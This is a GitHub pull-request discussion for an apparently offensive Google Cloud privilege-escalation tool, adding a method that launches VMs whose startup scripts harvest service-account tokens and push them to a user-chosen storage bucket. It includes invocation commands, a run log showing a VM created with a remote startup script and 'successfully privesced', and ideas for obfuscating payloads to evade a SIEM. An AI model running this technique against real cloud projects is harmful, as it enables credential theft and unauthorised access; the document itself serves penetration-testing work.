gcploit icon indicating copy to clipboard operation
gcploit copied to clipboard

Support actAs with VM's in addition to*** GCF

Open 4ndygu opened this issue 5 years ago • 24 comments

This PR supports lateral movement for users with Service Account User + Compute User. The tactic here is to mount compute instances with startup scripts that recurrently pull from the token endpoints and push them to a user's chosen GCS bucket. Identities must have access to the bucket. I add the following flags:

actAsMethod -- defaults to cloud function, but can support vm based lateral movement bucket -- stores startup script information for the service account at hand

I can call with:

python3 main.py --exploit actas --actAsMethod vm --bucket gcploit_eater --project speedy-cab-288518 --target all

The PR also includes some name changes to support extensibility. Please let me know if other solutions work better!

There are a few wishlist items:

  • Payload obfuscation with a key that we can host in the GCS bucket, or base64 to bypass a SIEM.
  • Potentially throwing in the vector for Service Account Token creators by directly calling --impersonate-service-account.
  • Better handling of utils (though I suppose this is a generic quality item).

4ndygu avatar Sep 10 '20 00:09 4ndygu

Hmmm the bucket seems a little tricky in some cases. Would it make more sense to just have the startup script run a simple python server on port 80 that returns data with a supplied password?

dxa4481 avatar Sep 17 '20 00:09 dxa4481

Hmm, I thought about the port 80 situation, but it may be difficult to reach that server without a corresponding firewall rule change. I recognize that default ports may allow ingress on the default network, but it would be difficult to guarantee token access without a corresponding guarantee that the firewall ports are open.

Pushing routinely to GCS allows us to take advantage of gcp hosts typically having lax egress requirements, especially when it comes to storage services in GCP, to GCP ips. Although I might be mistaken here -- how do you feel?

4ndygu avatar Sep 17 '20 01:09 4ndygu

What if the data was brokered through the compute metadata? That should be available, and if you could land a startup script you should have permissions to it already.

dxa4481 avatar Sep 17 '20 01:09 dxa4481

Oh I guess not all the instances will have permission to the metadata though

dxa4481 avatar Sep 17 '20 01:09 dxa4481

Hrm... the only thing with the bucket is there's an action the user has to take to explicitly add the service account to it. Maybe a big message when you run the module "MAKE SURE YOU GIVE <service account> ACCESS TO THE BUCKET WITH <command to set bucket IAM policy>" or something like that, just so there's no confusion.

dxa4481 avatar Sep 17 '20 01:09 dxa4481

I think that if compute metadata were unavailable, the entire vector is dead in the water :(. That being said, since this vector relies on the creation of new VMs, my assumption is that technically ,we do have it.

In any case, this PR edits the flags to ask users to manually supply their own bucket. I'll add a commit to let users know they have to give the SA Access to the bucket :).

4ndygu avatar Sep 17 '20 01:09 4ndygu

A quick note -- I would imagine that if I were a user, I would just make the bucket publically writable but not readable, i.e. giving Storage Object Creator to AllUsers. How do you feel?

4ndygu avatar Sep 17 '20 02:09 4ndygu

[pushed my conception of that up.]

4ndygu avatar Sep 17 '20 02:09 4ndygu

A quick note -- I would imagine that if I were a user, I would just make the bucket publically writable but not readable, i.e. giving Storage Object Creator to AllUsers. How do you feel?

Because the user has full control over the bucket, they should always be able to add the service account to it, no? No reason to not lock it down, right?

dxa4481 avatar Sep 17 '20 02:09 dxa4481

right. I was appealing to the scenario where someone may see a project with a large # of different service accounts, which would in turn have projects with large #s of different service accounts. It may get unwieldy to manage all those credentials first, then load permissions accordingly.

The additional risk profile is write-only, not read, so I suppose a malicious user could overwrite existing keys, but not extend access by reading new objects in that GCS bucket.

In any case, I abstracted the command with <serviceAccount>.

4ndygu avatar Sep 17 '20 02:09 4ndygu

Hi! I went ahead and also added support for escalation if users have the Notebooks Runner / Notebooks Admin role, where users using the beta AI Platform Notebooks feature can generate arbitrary hosts with arbitrary metadata (and thus, startup scripts). Also moved out some common functions into the utils code.

4ndygu avatar Sep 20 '20 15:09 4ndygu

Ahh nice. Another question, I notice the bucket currently needs to be hard coded into the source and modified by the user, but this workflow is difficult particularly from folks who want to pull the image from Dockerhub.

Can we move this bucket to be configurable by command line argument?

dxa4481 avatar Sep 21 '20 07:09 dxa4481

Cool -- I think that currently, the script name replaces the bucketname with YOURBUCKETNAMEHERE, and the code takes the command line argument and effectively replaces the bucket name dynamically. If I understand correctly, we should be able to run this commit at least purely via command line argument.

I see your point though -- At least in the startup.sh part, we're dynamically changing a file path that might be hardcoded. Is that what you mean? There probably is an easier way of parameterizing this, potentially by storing the script in memory and doing a replace.

I'm messing with a way to attach arbitrary python packages to a dataflow job to replicate this script, and i'll take a shot at doing the replace if I'm understanding your message :).

4ndygu avatar Sep 21 '20 13:09 4ndygu

For more clarity -- the function doing the dynamic replace is https://github.com/dxa4481/gcploit/pull/10/files#diff-e6186f834ed280c4cb710843e5da633bR6

4ndygu avatar Sep 21 '20 13:09 4ndygu

Hi @dxa4481! Just wanted to check in on this. I edited the above functionality while working on another lateral feature, and can send that as soon as I figure some stuff out with Dataflow.

4ndygu avatar Oct 01 '20 19:10 4ndygu

Just got around to testing. I was able to use the VM source, but when I go to actually use the SA for commands I'm getting this error when it tries to fetch a credential:

Traceback (most recent call last):
  File "main.py", line 298, in <module>
    main()
  File "main.py", line 245, in main
    return_output = run_cmd_on_source(args.source, args.gcloud_cmd, project=args.project, bucket=args.bucket)
  File "main.py", line 205, in run_cmd_on_source
    source.refresh_cred(db_session, utils.run_gcloud_command_local, dataproc=dataproc, bucket_name=bucket)
  File "/models.py", line 67, in refresh_cred
    blob = self.client.bucket(bucket_name).blob(self.serviceAccount).download_to_filename("/tmp/gcploit_temporary_credentials")
  File "/usr/local/lib/python3.8/site-packages/google/cloud/storage/blob.py", line 1131, in download_to_filename
    self.download_to_file(
  File "/usr/local/lib/python3.8/site-packages/google/cloud/storage/blob.py", line 1025, in download_to_file
    download_url = self._get_download_url(
  File "/usr/local/lib/python3.8/site-packages/google/cloud/storage/blob.py", line 775, in _get_download_url
    hostname=client._connection.API_BASE_URL, path=self.path
  File "/usr/local/lib/python3.8/site-packages/google/cloud/storage/blob.py", line 281, in path
    return self.path_helper(self.bucket.path, self.name)
  File "/usr/local/lib/python3.8/site-packages/google/cloud/storage/bucket.py", line 1012, in path
    raise ValueError("Cannot determine path without bucket name.")
ValueError: Cannot determine path without bucket name.

Any idea what's causing this?

Also unrelated, would you mind removing the pyc file committed?

Sorry if responses are a little delayed, I'm in the middle of a move, so things are a little crazy.

dxa4481 avatar Oct 05 '20 06:10 dxa4481

No worries, good luck on the move! I'll hit these after work today.

  • happy to remove the pyc file.
  • my guess is that the credential refresh method is having some issues pushing / pulling from the bucket. did you provide the bucket_name parameter when you supplied a gcloud command and source? I suppose we should add the same parameter guard as we do with the exploit.

4ndygu avatar Oct 05 '20 14:10 4ndygu

I did provide the bucket name, and both the base identity and the target identity had project editor on the bucket, all of which lived in the same project I was provisioning the VM.

dxa4481 avatar Oct 05 '20 14:10 dxa4481

killed pyc.

re: the bucket issue, I just confirmed that I was able to run with the following command:

python3 main.py --gcloud "compute instances list" --source_cf {nameofinstance} --bucket {bucketname}

I have a hunch that this might be due to an assumption the storage.Client() call has on an underlying project variable. If you run gcloud config set project {} and then run, does it work? I get a different error, but that might be relevant.

In any case, I'll work on seeding the project with a user-supplied name.

4ndygu avatar Oct 05 '20 19:10 4ndygu

I added a configuration to specify the GCS client project. Please lmk if this helps with your issue!

4ndygu avatar Oct 10 '20 17:10 4ndygu

So here's the output of the command after pulling the latest:

 gcploit --exploit actas --project bugbountyshinanigans-242522 --target_sa [email protected] --actAsMethod vm --bucket potatoy
*************************************************
MAKE SURE YOU GIVE ALL USERS *WRITE* ACCESS TO YOUR BUCKET WITH gsutil iam ch <serviceAccountName>:objectCreator gs://potatoy. OTHERWISE, YOUR SCRIPTS WONT BE ABLE TO PUSH CREDS TO YOU.
*************************************************
Running command:
gcloud config set project bugbountyshinanigans-242522
Running command:
gcloud services enable cloudresourcemanager.googleapis.com
Running command:
gcloud auth print-identity-token
Running command:
gcloud config set project bugbountyshinanigans-242522
Running command:
gsutil cp ./utils/startup.sh gs://potatoy
error code Command '['gsutil', 'cp', './utils/startup.sh', 'gs://potatoy']' returned non-zero exit status 1. b'Copying file://./utils/startup.sh [Content-Type=text/x-sh]...\n/ [0 files][    0.0 B/  635.0 B]                                                \rYour "OAuth 2.0 Service Account" credentials are invalid. Please run\n  $ gcloud auth login\nOSError: No such file or directory.\n'
Running command:
gcloud services enable services.googleapis.com
error code Command '['gcloud', 'services', 'enable', 'services.googleapis.com']' returned non-zero exit status 1. b"ERROR: (gcloud.services.enable) PERMISSION_DENIED: Not found or permission denied for service(s): services.googleapis.com.\n- '@type': type.googleapis.com/google.rpc.PreconditionFailure\n  violations:\n  - subject: ?error_code=220002&services=services.googleapis.com\n    type: googleapis.com\n- '@type': type.googleapis.com/google.rpc.ErrorInfo\n  domain: serviceusage.googleapis.com\n  metadata:\n    services: services.googleapis.com\n  reason: SERVICE_CONFIG_NOT_FOUND_OR_PERMISSION_DENIED\n"
Running command:
gcloud compute instances create vovpuopr --service-account [email protected] --scopes=cloud-platform --zone=us-central1-a --image-family ubuntu-2004-lts --image-project ubuntu-os-cloud --metadata startup-script-url=gs://potatoy/startup.sh
~~~~~~~~~~ Created [https://www.googleapis.com/compute/v1/projects/bugbountyshinanigans-242522/zones/us-central1-a/instances/vovpuopr].
NAME      ZONE           MACHINE_TYPE   PREEMPTIBLE  INTERNAL_IP  EXTERNAL_IP    STATUS
vovpuopr  us-central1-a  n1-standard-1               10.128.0.51  34.122.74.132  RUNNING ~~~~~~~~~~
successfully privesced the [email protected] identitiy
~~~~~~~Got New Identity~~~~~~~~
name='vovpuopr', role='None', serviceAccount='[email protected]', project='bugbountyshinanigans-242522', password=''

I do have access to that bucket though as verified by:

 gsutil ls gs://potatoy/
gs://potatoy/bla
gs://potatoy/count-00000-of-00001
gs://potatoy/hi
gs://potatoy/outputs-00000-of-00001
gs://potatoy/tmp/

dxa4481 avatar Oct 11 '20 02:10 dxa4481

hmm, I replicated your setup and have been unable to issue the same behavior. To drill down a little bit more, did you seed your account with gcloud auth activate-service-account --key-file=xxxxx.json?

Additionally, if you literally run gsutil cp ./utils/startup.sh gs://YOURBUCKETNAME, does the upload follow through?

Sorry for the back'nforth!

4ndygu avatar Oct 11 '20 21:10 4ndygu

I have the correct service account activated:

gcloud auth list
                          Credentialed Accounts
ACTIVE  ACCOUNT
*       editordeleteme@bugbountyshinanigans-242522.iam.gserviceaccount.com

and I confirmed I can write to the bucket:

gsutil cp startup.sh gs://potatoy/


Updates are available for some Cloud SDK components.  To install them,
please run:
  $ gcloud components update

Copying file://startup.sh [Content-Type=application/x-sh]...
- [1 files][  657.0 B/  657.0 B]
Operation completed over 1 objects/657.0 B.

I'll do a little more testing later today

dxa4481 avatar Oct 13 '20 15:10 dxa4481

Hmm, I still have not been able to get this situation. Can you give me some of your output from gcloud info, namely your version of gsutil and current properties? also -- are you opening up the proxy during the test execution

4ndygu avatar Oct 31 '20 21:10 4ndygu